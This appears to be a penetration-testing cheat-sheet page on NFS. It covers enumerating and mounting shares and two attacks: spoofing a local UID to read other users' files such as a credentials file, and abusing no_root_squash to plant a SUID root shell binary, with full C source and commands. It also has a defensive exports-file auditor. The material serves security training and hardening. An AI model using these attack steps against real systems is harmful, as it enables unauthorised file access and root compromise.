# NFS (111-2049)

<details>

<summary>Protocol Information</summary>

NFS is a distributed file system protocol. It allows a user on a client computer to access files on a computer network as if they were on a locally mounted storage device (same purpose as SMB). NFS is often used with UNIX operating systems and is mostly insecure in its implementation. It can be somewhat difficult to configure securely, so it is not uncommon to find NFS shares open to the world.

There are **`3 versions`**:

* **`NFSv2`**: An older protocol, but supported by many systems; it initially worked entirely over UDP.
* **`NFSv3`**: Has more features, including variable file sizes and better error reporting, but is not fully compatible with NFSv2 clients.
* **`NFSv4`**: Includes Kerberos, works through firewalls and over the Internet, no longer requires portmappers, supports ACLs, applies state-based operations, and provides performance improvements and high security. It is also the first version to have a stateful protocol.

</details>

## Port

<table data-header-hidden><thead><tr><th width="166">Port</th><th>Description</th></tr></thead><tbody><tr><td><mark style="color:green;"><strong>111</strong></mark><strong> TCP/UDP</strong></td><td>NFS (rpcbind)</td></tr><tr><td><mark style="color:green;"><strong>2049</strong></mark><strong> TCP</strong></td><td>NFS </td></tr></tbody></table>

## Config File

* `/etc/exports` ([LINK](https://manpages.ubuntu.com/manpages/trusty/man5/exports.5.html))

## Interact

List the directories the server exports.

{% code overflow="wrap" %}

```bash
showmount -e <IP>
```

{% endcode %}

Mount an exported directory that was found.

{% code overflow="wrap" %}

```bash
mkdir <myDIR>
sudo mount -t nfs -o nolock <IP>:/<FOUND_DIR> ./<myDIR>
```

{% endcode %}

Once finished, unmount the directory.

{% code overflow="wrap" %}

```bash
sudo umount <myDIR>
```

{% endcode %}

## Attacks

### Read File

You can read files you have no permission for by changing your local UID to match the file owner's UID, because the server trusts the UID the client presents.

{% code overflow="wrap" %}

```bash
ls -n
# drwxr-xr-x 1 1014 1014  48 Jun 10  creds.txt
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo adduser <NAME>
sudo vim /etc/passwd # change the UID of <NAME> to 1014
# or
sudo sed -i -e 's/<UID_NAME>/1014/g' /etc/passwd

su <NAME>
id && cat creds.txt
```

{% endcode %}

### Shell with SUID binary

In `/etc/exports` there is an option that, if not set correctly, makes this attack possible.

* **`root_squash`**: If the root user is used to access NFS shares, it will be changed to the user nfsnobody, which is an account with no privileges. All files created and uploaded by the root user will be owned by the nfsnobody user, which prevents an attacker from uploading binary files with the SUID bit set.
* **`no_root_squash`**: Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow the creation of malicious scripts/programs with the SUID bit set.

So the idea is to create, as root on the attacking machine, a binary that spawns a shell, place it on the share with the SUID bit set, and then run it from the victim host.
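A defender-side check for the options above, added here as an example and not part of the original page: it parses exports(5)-style text and flags entries exported to any host, wildcard client patterns and `no_root_squash`. The sample exports file is constructed.

```python
import re
from typing import NamedTuple

SAMPLE_EXPORTS = """\
# constructed sample exports file (not from any real host)
/home         10.0.0.0/24(rw,sync,root_squash)
/srv/backup   *(rw,sync,no_root_squash)   # world-open, remote root keeps uid 0
/srv/public   *.example.com(ro,sync) 10.0.0.5(rw)
/srv/odd      (rw)
"""

class Finding(NamedTuple):
    path: str
    client: str
    options: tuple
    issues: tuple

_CLIENT = re.compile(r'^([^(]*)(?:\((.*)\))?$')  # "host", "host(opts)" or "(opts)"
def parse_exports(text):
    """Return (path, client, options) for every client entry in exports(5) text."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for token in clients or ['*']:            # no client at all means every host
            m = _CLIENT.match(token)
            if not m:
                continue
            client = m.group(1) or '*'            # bare "(opts)" also means every host
            opts = tuple(o for o in (m.group(2) or '').split(',') if o)
            entries.append((path, client, opts))
    return entries

def audit_exports(text):
    """Flag entries that enable the attacks above; root_squash is the default when unset."""
    findings = []
    for path, client, opts in parse_exports(text):
        issues = []
        if client == '*':
            issues.append('exported to any host' + (', writable' if 'rw' in opts else ''))
        elif client.startswith(('*', '?')):
            issues.append('wildcard client pattern')
        if 'no_root_squash' in opts:
            issues.append('no_root_squash: remote root keeps uid 0 and can plant SUID binaries')
        if issues:
            findings.append(Finding(path, client, opts, tuple(issues)))
    return findings
```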

1. Create the binary that invokes the shell.

{% code title="shell.c" overflow="wrap" %}

```c
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
  /* take the effective uid/gid granted by the SUID bit as real ids */
  setuid(0);
  setgid(0);
  system("/bin/bash");
  return 0;
}
```

{% endcode %}

{% code overflow="wrap" %}

```bash
gcc shell.c -o shell
```

{% endcode %}

2. Move the binary to the directory and set the SUID.

{% code overflow="wrap" %}

```bash
cp shell <myDIR>
chmod u+s <myDIR>/shell
```

{% endcode %}

3. Move to the victim host and run the binary.

{% code overflow="wrap" %}

```bash
./shell
```

{% endcode %}
